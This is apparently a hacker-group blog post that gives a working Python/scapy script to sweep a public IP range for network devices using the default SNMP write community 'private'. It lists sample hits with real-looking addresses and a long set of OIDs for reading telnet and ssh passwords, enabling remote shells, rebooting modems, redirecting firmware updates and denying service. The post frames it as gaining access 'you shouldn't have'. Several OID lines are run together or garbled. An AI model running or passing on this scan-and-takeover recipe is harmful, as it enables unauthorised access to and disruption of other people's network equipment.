At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:
#! /usr/bin/env python
import commands
from scapy.all import *
base = "69.2.1." #IP range to scan minus the last octet.
f = open('/tmp/snmp_output.txt', 'w+')
for i in range(1, 255):
ip = base+str(i)
print ip+"\n"
p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
pkt = sr1(p, timeout=1)
if pkt and pkt.sprintf("%IP.proto%") != "icmp":
p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1)
p2 = p1[1].split("'", 1)
print pkt.sprintf("%IP.src%")+" - "+p2[0]
f.write(pkt.sprintf("%IP.src%")+" - "+p2[0]+"\n")
f.close()
print "\nDONE!!!!!!!!!!!!!!!\n"
Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:
69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006
Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304
ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device"
1.3.6.1.2.1.4.24.2.1.1 <-ipforwardingdest
sysName.0 <-device name
1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 ... EnableTelnetServer.
1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0....telnetIpStackInterfaces.
1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0....telnetUserName..
1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0....telnetPassword..
1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0....telnetServerControl.
1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0....telnetSessionIp.
1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0....telnetSessionInProgress.
1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0....telnetForceUserLogout.
1.3.6.1.2.1.1.1.0 = System Description
1.3.6.1.2.1.1.3.0 = Modem up time
1.3.6.1.2.1.4 = Some useful information (walk)
1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext)
1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext)
1.3.6.1.2.1.2.2.1.6.2= Mac
1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth
1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth
1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk)
1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem
1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP
1.3.6.1.2.1.69.1.4.5.0 = Configuration file name
1.3.6.1.2.1.69.1.3.5.0 = Current firmware
1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP
1.3.6.1.2.1.69.1.4.3.0 = Time Server IP
1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk)
1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency
1.3.6.1.2.1.69.1.4.5.0 = Image File
1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next)
---[ Read / Write OIDs
1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now)
1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP
1.3.6.1.2.1.69.1.3.2.0 = Firmware filename
1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates)
1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled)
1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled)
1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port
1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port
1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs
1.3.6.1.2.1.1.5.0 = modem type
1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number
1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File
1.3.6.1.3.83.1.4.3.0 = Provisional Server
1.3.6.1.2.1.1.6.0 = Area String
1.3.6.1.2.1.4.20.1.3+(hfc ip) = Subnet Example 1.3.6.1.2.4.20.1.3.10.169.53.2451.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC
1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC
1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address
1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max Burst Up
1.3.6.1.2.1.2.2.1.6.5 = CPE MAC
1.3.6.1.4.1.1166.1.19.3.1.17.0Ii 1 or 0 enable or disable webif
1.3.6.1.4.1.4413.2.2.2.1.1.4.1 =βreflects the IP stack interfaces on which a ssh 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access."
1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access."
1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server.
1.3.6.1.4.1.4413.2.2.2.1.1.4.7 =terminate ssh session
You can find a lot more online. Enjoy and happy hacking π